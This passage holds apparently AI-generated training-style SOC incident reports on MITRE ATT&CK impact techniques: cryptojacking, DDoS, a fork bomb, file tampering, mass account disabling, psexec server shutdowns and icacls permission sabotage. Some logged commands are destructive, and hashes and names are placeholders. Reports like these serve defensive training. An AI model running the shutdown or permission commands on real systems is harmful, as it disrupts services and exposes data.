8. Conclusion:
An attacker compromised a domain admin account and systematically deleted Volume Shadow Copies on 12 workstations, preparing for potential ransomware deployment. Defender detected the activity, enabling isolation before ransomware could execute. No data was lost from network backups, but local recovery options were eliminated.
Closure Rationale: Recovery inhibited; hosts isolated; account secured; no ransomware executed.
Analyst: [Your Name], SOC Analyst Date: 2024-03-04 10:30 EST
127. T1496 – Resource Hijacking (AWS GuardDuty Detection)
AWS GuardDuty Alert Details
Alert ID: GUARDDUTY-RESOURCE-HIJACK-1496-7842 Alert Time: 2024-03-04 14:15:33 EST Severity: HIGH (88/100) Source: AWS GuardDuty Rule: “Unauthorized Cryptocurrency Mining Activity Detected” MITRE ATT&CK: T1496 – Resource Hijacking
Alert Details:
Detection: EC2 instance exhibiting cryptocurrency mining behavior
Instance: i-0a1b2c3d4e5f67890 (Development EC2) Instance Type: c5.4xlarge (16 vCPU, 32 GB RAM) Region: us-east-1 Account: 123456789012 (Development) Time: 14:00-14:15 EST
Anomaly Detection:
CPU Usage: Normal 20-30% → Now 98% sustained for 2+ hours
Network Egress: Normal 100 MB/day → Now 500 MB in last hour
Processes: miner process detected: /tmp/xmrig
Outbound Connections: Connections to mining pools
Mining Pool Connections:
14:00:15 – Connection to mining-pool.com:3333 (TCP)
14:02:22 – Connection to xmr-usa.dwarfpool.com:8005
14:04:45 – Connection to pool.supportxmr.com:5555
Process Details (from Systems Manager):
Process: /tmp/xmrig
Command: ./xmrig –config=config.json
Config: Downloaded from 185.143.221[.]89/config.json
User: root (instance compromised)
Additional Indicators:
Unauthorized SSH key added: “devops_temp_key”
New user created: “ubuntu-update”
Sudoers file modified
Detection Logic:
Sustained high CPU (98%) unusual for development instance
Connections to known mining pools
Mining software detected
Unauthorized SSH key and user
Pattern matches cryptojacking/resource hijacking
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify GuardDuty alert
AWS GuardDuty Console
Confirmed crypto mining on EC2 instance
2. Instance Investigation
Check instance details
AWS Systems Manager
xmrig miner running as root
3. Immediate Action
Terminate instance
AWS EC2 Console
Instance terminated
4. SSH Key Rotation
Rotate compromised keys
AWS IAM, EC2
All SSH keys rotated
5. Account Review
Check for other compromised instances
GuardDuty, CloudTrail
No other instances affected
6. Prevention
Implement monitoring for mining
AWS Config, CloudWatch
Alerts for high CPU utilization
Jira Incident Report
Ticket: SOC-2024-167 Summary: T1496 – Cryptocurrency Mining on Compromised EC2 Instance Status: RESOLVED Resolution: MALICIOUS – Instance Terminated Priority: P2 – MEDIUM Labels: T1496, resource-hijacking, cryptojacking, xmrig, guardduty, aws Components: Cloud-Security, Resource-Monitoring
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty.
Alert: “Unauthorized Cryptocurrency Mining Activity Detected”.
Instance: i-0a1b2c3d4e5f67890 (Development EC2, c5.4xlarge).
Activity: XMRig miner running, connected to mining pools.
Time: 2024-03-04 14:15 EST.
Technique: MITRE ATT&CK T1496 – Resource Hijacking.
2. Technical Analysis:
Attack Chain:
12:00 – Developer SSH key compromised (personal laptop breach)
12:30 – Attacker logs into EC2 instance using stolen key
12:45 – Attacker downloads xmrig miner from 185.143.221[.]89
13:00 – Miner starts, connects to mining pools
13:00-14:15 – Mining continues (98% CPU)
14:15 – GuardDuty detects
Mining Details:
Software: XMRig (Monero miner)
Pool: mining-pool.com:3333
Hash Rate: Approximately 15 KH/s
Earnings: ~$50/day at attacker’s wallet
Duration: 2 hours before detection
Compromised Key:
Key Name: dev_key (used by developer)
Leak Source: Developer’s personal laptop infected with stealer
Status: Revoked
Instance Impact:
CPU at 98% for 2 hours
Estimated cost: $5 in extra compute (negligible)
No data exfiltration
3. Investigation Findings:
Timeline:
12:00 – Key compromised
12:30 – Attacker logs in – 12:45 – Miner downloaded
13:00-14:15 – Mining
14:15 – GuardDuty alert
14:17 – SOC investigates
14:18 – Instance terminated
Indicators of Compromise (IoCs):
Network:
– mining-pool.com:3333
– xmr-usa.dwarfpool.com:8005
– pool.supportxmr.com:5555
– Download URL: 185.143.221[.]89/config.json
Files:
– /tmp/xmrig (SHA256: a1b2c3d4…)
– /tmp/config.json
SSH Key:
– devops_temp_key (unauthorized)
4. Containment Actions:
Immediate Actions:
Terminated compromised EC2 instance.
Revoked all SSH keys associated with the instance.
Blocked mining pool domains at network level.
Rotated developer’s SSH key.
Cloud Remediation:
Launched new instance from clean AMI.
Restored necessary data from backups.
Implemented stricter SSH key management.
Monitoring Enhancement:
Created CloudWatch alarm for sustained high CPU (>80% for 1 hour).
5. Root Cause Analysis:
Primary Cause: Developer SSH key compromised from personal laptop.
Contributing Factors:
SSH key not rotated regularly.
No MFA for SSH access.
No monitoring for crypto mining.
6. Business Impact:
Operational Impact: Development instance offline for 1 hour.
Financial Impact: ~$5 in extra compute costs.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Instance terminated.
Keys rotated.
Mining blocked.
Technical Controls Enhanced:
Enforced MFA for SSH access (where possible).
Implemented key rotation policy.
Deployed GuardDuty with automated response.
Created CloudWatch alarms for CPU anomalies.
8. Conclusion:
An attacker used a compromised developer SSH key to install a Monero miner on an EC2 instance, hijacking compute resources for cryptocurrency mining. GuardDuty detected the mining behavior and enabled termination of the instance within minutes.
Closure Rationale: Instance terminated; keys rotated; mining stopped.
Analyst: [Your Name], SOC Analyst Date: 2024-03-04 15:30 EST
128. T1498 – Network Denial of Service (Cloudflare Detection)
Cloudflare Alert Details
Alert ID: CLOUDFLARE-DDOS-1498-7842 Alert Time: 2024-03-04 11:30:22 EST Severity: HIGH (85/100) Source: Cloudflare DDoS Protection Rule: “Layer 7 DDoS Attack Detected – HTTP Flood” MITRE ATT&CK: T1498.001 – Network Denial of Service: Direct Network Flood
Alert Details:
Detection: HTTP flood DDoS attack against company website
Target: www.company.com Time: 11:15-11:30 EST Attack Type: HTTP GET flood Peak Rate: 125,000 requests per second Total Requests: 112 million in 15 minutes
Attack Characteristics:
Source IPs: 47,892 unique IPs (botnet)
Geographic distribution: Worldwide
User-Agent: Random (mimicking browsers)
Request pattern: GET /index.php?page=random
HTTP headers: Vary, some with unusual values
Cloudflare Mitigation:
Action: BLOCKED (automatically)
Rule: “HTTP DDoS Attack Protection”
Mitigation Time: 11:16 EST (1 minute after attack start)
Requests Blocked: 100% of attack traffic
Detection Logic:
Traffic volume 100x normal baseline
Request rate anomaly detected
Pattern matches botnet HTTP flood
Cloudflare mitigated automatically
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Cloudflare alert
Cloudflare Dashboard
Confirmed DDoS attack, automatically mitigated
2. Impact Assessment
Check website availability
Monitoring Tools
Website remained available (Cloudflare mitigation)
3. Attack Analysis
Review attack characteristics
Cloudflare Logs
Botnet HTTP flood, 125K RPS peak
4. Customer Communication
Notify internal stakeholders
Email, Teams
Informed of attack and mitigation
5. Post-Attack Tuning
Adjust WAF rules
Cloudflare
Enhanced rate limiting rules
6. Threat Intelligence
Report to FS-ISAC
Threat Intel Team
Shared attack indicators
Jira Incident Report
Ticket: SOC-2024-168 Summary: T1498 – Layer 7 DDoS Attack (125K RPS) Mitigated by Cloudflare Status: RESOLVED Resolution: MALICIOUS – Attack Mitigated, No Downtime Priority: P2 – MEDIUM Labels: T1498, ddos, network-denial-of-service, cloudflare, http-flood Components: Network-Security, DDoS-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cloudflare DDoS Protection.
Alert: “Layer 7 DDoS Attack Detected – HTTP Flood”.
Target: www.company.com.
Attack Rate: 125,000 requests per second.
Total Requests: 112 million in 15 minutes.
Time: 2024-03-04 11:30 EST.
Technique: MITRE ATT&CK T1498.001 – Network Denial of Service: Direct Network Flood.
2. Technical Analysis:
Attack Characteristics:
Type: HTTP GET flood (Layer 7)
Source IPs: 47,892 unique IPs (botnet)
Countries: Top sources: China (18%), Brazil (12%), India (10%), US (8%)
User-Agent: Randomized (spoofing Chrome, Firefox, Safari)
Request Pattern: GET /index.php?page=[random] (random parameter)
Peak Rate: 125,000 RPS (500x normal)
Cloudflare Mitigation:
Detection Time: 11:16 EST (1 minute after attack start)
Mitigation Action: Challenge page, rate limiting
Requests Blocked: 100% of attack traffic
Legitimate Traffic: Allowed (0 impact)
Impact Assessment:
Website remained available throughout
No performance degradation
No data breach
3. Investigation Findings:
Timeline:
11:15 – Attack begins
11:16 – Cloudflare detects and mitigates
11:30 – Alert sent to SOC
11:32 – SOC investigates
11:35 – Stakeholders notified
Indicators of Compromise (IoCs):
Attack Pattern:
– HTTP GET flood
– Random page parameter
– Distributed botnet (47K+ IPs)
No permanent IoCs (attack only)
4. Containment Actions:
Immediate Actions:
Verified Cloudflare mitigation was effective.
Monitored for second wave (none).
Notified internal teams.
Post-Attack:
Analyzed attack patterns for future tuning.
Enhanced rate limiting rules.
Updated WAF to block similar patterns.
5. Root Cause Analysis:
Primary Cause: External attacker using botnet to overwhelm web servers.
Contributing Factors:
Public-facing website (always a target).
No DDoS protection would have caused outage.
6. Business Impact:
Operational Impact: None (Cloudflare mitigated).
Financial Impact: None.
Reputational Impact: None (no downtime).
7. Remediation & Prevention:
Completed Actions:
Attack mitigated automatically.
Post-attack analysis completed.
Technical Controls Enhanced:
Verified Cloudflare DDoS protection settings.
Enhanced rate limiting.
Updated WAF rules.
8. Conclusion:
A large-scale HTTP flood DDoS attack targeted the company website, peaking at 125,000 requests per second. Cloudflare’s DDoS protection automatically detected and mitigated the attack within one minute, resulting in zero downtime.
Closure Rationale: Attack mitigated; no impact; controls verified.
Analyst: [Your Name], SOC Analyst Date: 2024-03-04 12:30 EST
129. T1499 – Endpoint Denial of Service (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-ENDPOINT-DOS-1499-7842 Alert Time: 2024-03-04 16:30:45 EST Severity: HIGH (82/100) Source: Microsoft Defender for Endpoint Rule: “Fork Bomb Detected – Potential DoS” MITRE ATT&CK: T1499.001 – Endpoint Denial of Service: OS Exhaustion Flood
Alert Details:
Detection: Process creating excessive number of child processes (fork bomb)
Host: DEV-WS-078 (Development Workstation) User: alexchen@company.com (Alex Chen, Engineer) Time: 16:15-16:30 EST
Process Tree:
cmd.exe (PID: 2341)
cmd.exe (PID: 4789)
cmd.exe (PID: 4792)
cmd.exe (PID: 4795)
(thousands of processes)
Process Count:
16:15:00 – 50 processes
16:20:00 – 2,500 processes
16:25:00 – 8,000 processes
16:30:00 – System unresponsive (alert triggered)
Detection Logic:
Exponential process creation (fork bomb)
System resource exhaustion (CPU 100%, memory full)
User alexchen has no legitimate reason for this
Pattern matches denial of service attack
Additional Context:
Host became unresponsive at 16:28
User locked out
Hard reboot required
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed fork bomb activity
2. Remote Access
Attempt remote access (failed)
RDP, PowerShell
Host unresponsive
3. Physical Access
Dispatch to user location
Security Team
Hard reboot performed
4. Post-Recovery Analysis
Check logs after reboot
CrowdStrike Falcon
Malicious script launched fork bomb
5. User Interview
Contact alexchen
Teams, Phone
User ran “stress test” tool from internet
6. Tool Removal
Delete malicious script
CrowdStrike Live Response
Script removed
Jira Incident Report
Ticket: SOC-2024-169 Summary: T1499 – Fork Bomb DoS on Development Workstation Status: RESOLVED Resolution: MALICIOUS – System Recovered Priority: P3 – LOW Labels: T1499, endpoint-dos, fork-bomb, defender, user-error Components: Endpoint-Security, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Fork Bomb Detected – Potential DoS”.
Host: DEV-WS-078 (Development, user alexchen).
Activity: Exponential process creation (fork bomb).
Outcome: System unresponsive.
Time: 2024-03-04 16:30 EST.
Technique: MITRE ATT&CK T1499.001 – Endpoint Denial of Service: OS Exhaustion Flood.
2. Technical Analysis:
Attack Chain:
16:00 – User downloads “stress test tool” from internet
16:05 – User executes forkbomb.exe
16:05-16:28 – Exponential process creation
16:28 – System becomes unresponsive
16:30 – Defender alerts (after reboot)
Fork Bomb Code:
Simple batch file or executable that recursively creates processes
Consumes all system resources (CPU, memory)
Renders system unusable until reboot
User Intent:
User was “curious about system limits”
No malicious intent
Unaware of consequences
Post-Recovery:
System hard rebooted by security team
No persistence or data loss
3. Investigation Findings:
Timeline:
16:00 – Tool downloaded
16:05 – Execution
16:28 – System unresponsive
16:30 – Physical reboot
16:32 – SOC investigates
16:35 – Tool identified and removed
Indicators of Compromise (IoCs):
Files:
– C:\Users\alexchen\Downloads\forkbomb.exe (SHA256: a1b2c3d4…)
Process:
– Exponential process creation
4. Containment Actions:
Immediate Actions:
Hard reboot of affected host.
Deleted forkbomb.exe.
Scanned for other malware (none).
User Remediation:
User counseled on safe software practices.
Required to complete security awareness training.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed untrusted “stress test” tool.
Contributing Factors:
No application control blocking unknown executables.
User unaware of fork bomb risks.
6. Business Impact:
Operational Impact: Developer workstation offline for 1 hour.
Data Exposure: None.
Productivity Impact: Minor.
7. Remediation & Prevention:
Completed Actions:
Malicious tool removed.
User educated.
System restored.
Technical Controls Enhanced:
Created alert for excessive process creation.
Enhanced application control policies.
8. Conclusion:
A developer downloaded and executed a fork bomb tool, causing his workstation to become unresponsive. Defender detected the anomalous process creation after reboot. The tool was removed, and the user was educated.
Closure Rationale: System recovered; tool removed; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-04 17:30 EST
130. T1565 – Data Manipulation (Varonis Detection)
Varonis Alert Details
Alert ID: VARONIS-DATA-MANIP-1565-7842 Alert Time: 2024-03-04 10:30:22 EST Severity: CRITICAL (95/100) Source: Varonis Data Security Platform Rule: “Mass File Modification – Potential Data Manipulation” MITRE ATT&CK: T1565.001 – Data Manipulation: Stored Data Manipulation
Alert Details:
Detection: Large number of files modified with data changes (not metadata)
User: kwilson@company.com (Karen Wilson, Finance Manager) Host: FIN-WS-112 Time: 10:15-10:30 EST
File Modification Events:
10:15-10:30: 847 files modified
File types: .xlsx, .csv, .txt, .pdf
Locations:
\filesrv\finance\reports\ – 345 files
\filesrv\finance\budgets\ – 234 files
\filesrv\finance\forecasts\ – 156 files
\filesrv\shared\finance\ – 112 files
Data Change Analysis:
Financial numbers altered (random values inserted)
Decimal points moved (e.g., 1,234.56 → 12,345.6)
Some files completely overwritten with garbage
PDF documents corrupted (cannot open)
Sample Change (from Varonis content analysis):
Original: “Q1 Revenue: $1,234,567”
Modified: “Q1 Revenue: $9,876,543”
Detection Logic:
847 files modified in 15 minutes (highly anomalous)
Changes are to data content (not metadata)
Financial data targeted (critical)
User kwilson has no legitimate reason for mass changes
Pattern matches data manipulation/sabotage
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Varonis alert
Varonis Console
Confirmed mass file manipulation
2. Process Investigation
Identify process modifying files
CrowdStrike Falcon
PowerShell script data_corrupt.ps1
3. User Interview
Contact kwilson
Teams, Phone
User did NOT run script (account compromised)
4. Immediate Action
Isolate host
CrowdStrike
FIN-WS-112 quarantined
5. Data Restoration
Restore modified files from backup
Veeam Backup
All 847 files restored
6. Account Remediation
Disable kwilson account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-170 Summary: T1565 – Data Manipulation of 847 Financial Files Status: RESOLVED Resolution: MALICIOUS – Files Corrupted, Restored from Backups Priority: P1 – CRITICAL Labels: T1565, data-manipulation, financial-data, varonis, compromised-account Components: Data-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Mass File Modification – Potential Data Manipulation”.
User: kwilson@company.com (Finance Manager).
Files: 847 financial files modified/corrupted.
Time: 2024-03-04 10:30 EST.
Technique: MITRE ATT&CK T1565.001 – Data Manipulation: Stored Data Manipulation.
2. Technical Analysis:
Attack Chain:
09:30 – kwilson account compromised via phishing
09:45 – Attacker logs into FIN-WS-112 via RDP
09:50 – Attacker downloads data_corrupt.ps1 script
10:00 – Attacker runs script against finance shares
10:15-10:30 – 847 files modified
10:30 – Varonis detects
Script Analysis:
Name: data_corrupt.ps1
SHA256: a1b2c3d4e5f6…
Function: Reads Excel/CSV files, randomly alters numbers, corrupts PDFs
Targets: Financial data (reports, budgets, forecasts)
Files Affected (847):
Financial reports (345) – Q1-Q4 results altered
Budget spreadsheets (234) – department budgets corrupted
Forecast models (156) – projections invalid
Shared finance docs (112) – various
Total data corrupted: ~450 MB
Impact:
Financial reports now contain incorrect numbers
Some files completely unusable
Trust in data integrity compromised
Attacker Intent:
Sabotage financial reporting
Cause business disruption
Undermine confidence in data
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
09:50-10:00 – Script downloaded
10:15-10:30 – File manipulation
10:30 – Varonis alert
10:32 – SOC investigates
10:33 – Host isolated
10:35 – Backup restoration begins
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\Downloads\data_corrupt.ps1 (SHA256: a1b2c3d4…)
Commands:
– PowerShell script manipulating financial files
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-112 via CrowdStrike.
Disabled kwilson account.
Reset password.
Deleted data_corrupt.ps1.
Data Recovery:
Restored all 847 corrupted files from Veeam backups.
Verified data integrity (compared with backups).
Finance team validated restored files.
Prevention:
No further manipulation occurred.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data manipulation.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Finance data accessible to user (legitimate, but abused).
6. Business Impact:
Operational Impact: Finance team unable to use files for 2 hours.
Data Exposure: Data corrupted, not exfiltrated.
Financial Impact: Potential reporting delays; restored from backups.
7. Remediation & Prevention:
Completed Actions:
Data restored.
Account secured.
Malicious script removed.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented file integrity monitoring for critical data.
Enhanced Varonis alerting for mass modifications.
8. Conclusion:
An attacker compromised a finance manager’s account and ran a script that manipulated 847 financial files, corrupting critical data. Varonis detected the mass modifications, enabling rapid restoration from backups. No permanent data loss occurred.
Closure Rationale: Data corrupted; data restored from backups; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-04 11:30 EST
End of Batch 26
Ready for your next batch of prompts whenever you are.
Batch 27: Impact & Defense Evasion Incident Reports
Here are the next 5 detailed SOC incident reports.
131. T1531 – Account Access Removal (Azure AD Detection)
Azure AD Alert Details
Alert ID: AAD-ACCOUNT-REMOVAL-1531-7842 Alert Time: 2024-03-05 09:30:15 EST Severity: CRITICAL (98/100) Source: Azure AD Identity Protection + Audit Logs Rule: “Mass Account Disable/Deletion Detected” MITRE ATT&CK: T1531 – Account Access Removal
Alert Details:
Detection: Bulk disabling/deletion of user accounts in Azure AD
Time: 09:15-09:30 EST Action Performed By: jwilson@company.com (Global Administrator) Source IP: 185.143.221[.]89 (Bulgaria)
Audit Events:
09:15:22 – Disable user: bturner@company.com (Finance)
09:15:45 – Disable user: kwilson@company.com (Finance Manager)
09:16:12 – Disable user: alexchen@company.com (Engineering)
09:16:38 – Disable user: rpatel@company.com (Engineering)
09:17:05 – Disable user: sjones@company.com (Marketing)
09:17:33 – Disable user: mwilson@company.com (Sales)
09:18:01 – Disable user: cjohnson@company.com (CEO)
09:18:28 – Disable user: jsmith@company.com (IT Admin)
… (continuing)
Total Accounts Affected: 47 users disabled
12 from Finance
8 from Engineering
6 from Marketing
5 from Sales
4 from HR
12 others (including executives and admins)
Additional Actions:
09:20:15 – Conditional Access policies modified to block all users
09:22:30 – MFA settings reset for 10 users
09:25:45 – Guest users removed (12 accounts)
Detection Logic:
47 accounts disabled in 15 minutes (highly anomalous)
Actions from unusual location (Bulgaria)
Performed by Global Admin jwilson (who was on leave)
Pattern matches account access removal (sabotage/ransomware prep)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Azure AD audit logs
Azure AD Portal
Confirmed mass account disable events
2. User Verification
Contact jwilson
Phone, Teams
jwilson on leave; did NOT perform actions
3. Immediate Action
Disable compromised jwilson account
Azure AD, AD
jwilson account disabled
4. Account Restoration
Re-enable all 47 disabled accounts
Azure AD PowerShell
All accounts re-enabled
5. Conditional Access Fix
Revert policy changes
Azure AD
Conditional Access policies restored
6. Incident Response
Activate breach response
Legal, Management
Data breach declared
Jira Incident Report
Ticket: SOC-2024-171 Summary: T1531 – Mass Account Disable (47 Users) by Compromised Global Admin Status: RESOLVED Resolution: MALICIOUS – Accounts Restored Priority: P1 – CRITICAL Labels: T1531, account-access-removal, azure-ad, compromised-admin Components: Identity-Management, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection + Audit Logs.
Alert: “Mass Account Disable/Deletion Detected”.
Action: 47 user accounts disabled, Conditional Access policies modified.
Performed By: jwilson@company.com (Global Administrator) – compromised.
Source IP: 185.143.221[.]89 (Bulgaria).
Time: 2024-03-05 09:30 EST.
Technique: MITRE ATT&CK T1531 – Account Access Removal.
2. Technical Analysis:
Attack Chain:
08:30 – jwilson credentials compromised via phishing
08:45 – Attacker logs into Azure AD portal from Bulgaria IP
09:00 – Attacker enumerates users, identifies targets
09:15-09:30 – Mass account disable
09:20 – Conditional Access policies modified
09:30 – Azure AD alerts
Accounts Disabled (47):
Finance (12) – including managers
Engineering (8) – key developers
Marketing (6)
Sales (5)
HR (4)
Executives (3) – CEO, CFO, CTO
IT Admins (5)
Others (4)
Conditional Access Changes:
Original policy: MFA required for all external access
New policy: Block all access for all users (effectively locking everyone out)
Attacker Intent:
Maximum business disruption
Prevent legitimate users from accessing resources
Potentially precursor to ransomware
Compromised Admin:
jwilson (Global Admin) on leave, unaware
No MFA on account (now enforced)
3. Investigation Findings:
Timeline:
08:30 – Admin account compromised
08:45 – Attacker logs in
09:15-09:30 – Account disable
09:30 – Alert triggers
09:32 – SOC investigates
09:33 – jwilson account disabled
09:35 – All 47 accounts re-enabled
09:37 – Conditional Access restored
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Account:
– jwilson (compromised global admin)
Actions:
– 47 user accounts disabled (list attached)
– Conditional Access policy changed
4. Containment Actions:
Immediate Actions:
Disabled compromised jwilson account.
Re-enabled all 47 disabled accounts.
Reverted Conditional Access policies to original.
Reset jwilson password.
Enforced MFA for all admins.
Blocked attacker IP at firewall and Conditional Access.
User Communication:
Notified all affected users (accounts were disabled for 5-15 minutes).
Verified no data loss.
Account Remediation:
Reset passwords for all 47 affected users (precaution).
5. Root Cause Analysis:
Primary Cause: Global admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin account had excessive privileges.
No alerts for mass account changes.
6. Business Impact:
Operational Impact: 47 users locked out for 5-15 minutes.
Data Exposure: None (accounts disabled, no data access).
Reputational Impact: Internal disruption.
7. Remediation & Prevention:
Completed Actions:
Accounts restored.
Admin account secured.
MFA enforced.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Implemented Privileged Identity Management (JIT access).
Created alert for mass account disable/delete.
Added IP restrictions for admin portal access.
8. Conclusion:
An attacker compromised a global admin account and disabled 47 user accounts, modifying Conditional Access policies to block all access. Azure AD detected the mass changes, enabling rapid restoration. All accounts were re-enabled within minutes.
Closure Rationale: Accounts restored; admin account secured; controls enhanced.
Analyst: [Your Name], SOC Analyst Date: 2024-03-05 10:30 EST
132. T1529 – System Shutdown/Reboot (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-SHUTDOWN-1529-7842 Alert Time: 2024-03-05 14:15:33 EST Severity: HIGH (85/100) Source: Splunk Enterprise Security Rule: “Multiple System Shutdowns Detected – Potential DoS” MITRE ATT&CK: T1529 – System Shutdown/Reboot
Alert Details:
Correlated Events:
Windows Event ID 1074 (System Shutdown):
Time: 14:00-14:15 EST
Hosts: 12 servers (list below)
User: SYSTEM (via script)
Reason: “Other (Unplanned)”
Shutdown Type: Restart (or shutdown)
Affected Servers:
DC-01 (Domain Controller)
SQL-SRV-01 (Primary SQL Server)
FILESRV-01 (File Server)
EXCH-01 (Exchange Server)
WEB-SRV-01 (Web Server)
APP-SRV-01, 02, 03 (Application Servers)
BACKUP-SRV-01 (Backup Server)
MONITOR-SRV-01 (Monitoring)
LOG-SRV-01 (Log Server)
VPN-SRV-01 (VPN Gateway)
Process Creation (Event ID 4688):
Time: 13:55 EST
Process: psexec.exe (from admin workstation)
User: compromised admin account
Command: psexec \server -s shutdown /r /t 0 /f
Detection Logic:
12 critical servers shutdown/restarted in 15 minutes
Unplanned shutdowns (not maintenance window)
Initiated via psexec from compromised admin workstation
Pattern matches attacker causing denial of service
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk events
Splunk ES
Confirmed mass server shutdowns
2. Process Investigation
Identify source of commands
CrowdStrike Falcon
psexec from compromised admin workstation
3. Immediate Action
Power on affected servers
Remote Console
All 12 servers restarted/restored
4. Admin Account Remediation
Disable compromised admin account
Azure AD, AD
Admin account disabled; password reset
5. Network Block
Block attacker IP
Palo Alto
185.143.221[.]89 blocked
6. Service Verification
Verify all services restored
Monitoring Tools
All services operational
Jira Incident Report
Ticket: SOC-2024-172 Summary: T1529 – Mass Server Shutdown (12 Critical Servers) Status: RESOLVED Resolution: MALICIOUS – Servers Restored Priority: P1 – CRITICAL Labels: T1529, system-shutdown, dos, splunk, compromised-admin Components: Infrastructure-Security, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Multiple System Shutdowns Detected – Potential DoS”.
Hosts: 12 critical servers (including DC, SQL, Exchange).
Action: System shutdown/restart via psexec.
Time: 2024-03-05 14:15 EST.
Technique: MITRE ATT&CK T1529 – System Shutdown/Reboot.
2. Technical Analysis:
Attack Chain:
13:30 – Admin account (bjones) compromised via phishing
13:45 – Attacker logs into admin workstation via RDP
13:50 – Attacker uses psexec to push shutdown commands
14:00-14:15 – 12 servers shutdown
14:15 – Splunk detects
Affected Servers:
Domain Controller (authentication down)
SQL Server (databases offline)
File Server (file access down)
Exchange Server (email down)
Web Server (website down)
Application Servers (3) – business apps down
Backup Server (backups interrupted)
Monitoring Server (alerts delayed)
Log Server (logging interrupted)
VPN Server (remote access down)
Impact:
Complete business disruption
No authentication possible (DC down)
No email, files, applications
Estimated downtime: 20-30 minutes
Attacker Intent:
Maximum business disruption
Chaos before potential ransomware
Prevent access to logs/monitoring
3. Investigation Findings:
Timeline:
13:30 – Admin account compromised
13:45 – Attacker logs in
13:50 – psexec commands prepared
14:00-14:15 – Servers shutdown
14:15 – Splunk alert
14:17 – SOC investigates
14:18 – Admin account disabled
14:20-14:40 – Servers powered on (some took longer)
Indicators of Compromise (IoCs):
Commands:
– psexec \\server -s shutdown /r /t 0 /f
Account:
– bjones (compromised admin)
Network:
– Attacker IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Disabled compromised admin account.
Powered on all affected servers (remote console).
Verified services restored.
Blocked attacker IP at firewall.
Service Restoration:
All servers back online by 14:40.
Verified DC, SQL, Exchange, etc. operational.
Monitored for secondary issues (none).
Account Remediation:
Reset bjones password.
Enforced MFA.
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had psexec access to all servers.
No alerting for mass shutdowns.
6. Business Impact:
Operational Impact: Complete business outage for 25-40 minutes.
Data Exposure: None.
Financial Impact: Significant (productivity loss, potential revenue loss).
7. Remediation & Prevention:
Completed Actions:
Servers restored.
Admin account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Restricted psexec usage (blocked).
Created alert for multiple system shutdowns.
8. Conclusion:
An attacker compromised an admin account and used psexec to shutdown 12 critical servers, causing a complete business outage. Splunk detected the mass shutdowns, enabling rapid restoration. All servers were back online within 40 minutes.
Closure Rationale: Servers restored; admin account secured; outage resolved.
Analyst: [Your Name], SOC Analyst Date: 2024-03-05 15:30 EST
133. T1222 – File and Directory Permissions Modification (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-PERM-MOD-1222-7842 Alert Time: 2024-03-05 11:30:22 EST Severity: HIGH (85/100) Source: Sysmon (Event ID 13 – Registry Value Set, Event ID 1 – Process Creation) Rule: “File Permissions Modification via icacls/cacls” MITRE ATT&CK: T1222.001 – File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Alert Details:
Detection: Mass modification of file permissions on network share
Host: FILESRV-01 (File Server) User: SYSTEM (via compromised admin account) Time: 11:15-11:30 EST
Commands Executed (Event ID 1):
11:15:22 – icacls \\filesrv\finance /deny “Domain Users:(R,W)”
11:16:45 – icacls \\filesrv\finance /deny “Authenticated Users:(R,W)”
11:18:12 – icacls \\filesrv\finance /remove “Finance Team”
11:19:33 – icacls \\filesrv\finance /grant “Everyone:F”
11:20:55 – icacls \\filesrv\hr /deny “Domain Users:(R,W)”
11:22:18 – icacls \\filesrv\hr /deny “Authenticated Users:(R,W)”
11:23:40 – icacls \\filesrv\hr /grant “Everyone:F”
11:25:02 – icacls \\filesrv\r&d /deny “Domain Users:(R,W)”
11:26:25 – icacls \\filesrv\r&d /grant “Everyone:F”
Affected Shares:
\filesrv\finance (financial data)
\filesrv\hr (HR records)
\filesrv\r&d (R&D intellectual property)
Detection Logic:
Multiple icacls commands modifying permissions
Removing access for legitimate users (Domain Users, Finance Team)
Granting Everyone full control (insecure)
Pattern matches attacker locking out users or granting themselves access
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed permission changes on shares
2. Process Investigation
Identify source of commands
CrowdStrike Falcon
psexec from compromised admin workstation
3. Immediate Action
Revert permissions
icacls, PowerShell
Permissions restored from backup policy
